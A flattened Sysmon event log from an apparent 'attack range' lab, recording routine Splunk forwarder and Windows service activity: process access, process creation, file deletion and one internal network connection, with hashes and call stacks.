11:16:44.305{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-179C-6216-0F05-000000003902}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.305{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-179C-6216-0F05-000000003902}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.306{4F8D34B0-179C-6216-0F05-000000003902}580C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:45.697{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CABFD8AF978B068CE481BFA9A8DB69AD,SHA256=F0FCF4EA0C14C8E56F8D12BC058690DA2D131719BA5F31442B51D053C20F572D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:45.112{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=211139941D189D51ADBE3AC3F2F88EEE,SHA256=9DBCB031771A0EFF0A3295BB13DB3EC70CDA9FE262C61E8C1B9D0780DBB108E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:45.353{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BD4D339BCDC74FC7DF70E585EBF7764,SHA256=5503EA9C338403B80C4544299FAA7E3D7CB54BBF73372336B9A2F4D559BF82E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:45.353{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84A2B5D376806A1D414C21687A365D90,SHA256=59270EA644DB418FA6DBE1D0C9901E6ECF505FAC47232E2FE232467A0CF279DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-179E-6216-1105-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-179E-6216-1105-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.853{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-179E-6216-1105-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.854{4F8D34B0-179E-6216-1105-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.713{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46395F2CD4B7048DE3B5389529AA4378,SHA256=9A5F47836CBF1497724CB7C240180855D3C2FFB21536BF481A88BAB6CCC273FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:46.125{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EE8FE05EAA86E72321E25054464DB19,SHA256=550001EC6D5B68020580801129366A17DE8BFADDE08E4D408C402467BDBB8396,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:46.572{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:44.569{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51646-false10.0.1.12-8000- 23542300x8000000000000000221395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.979{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BD4D339BCDC74FC7DF70E585EBF7764,SHA256=5503EA9C338403B80C4544299FAA7E3D7CB54BBF73372336B9A2F4D559BF82E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:47.979{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=690B062D7B6D9E32D1EA321CBC374066,SHA256=3B090512F0D816A5E309520D636D50D5C6C4036C1A59E89872295E2E6FE8886E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:47.134{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 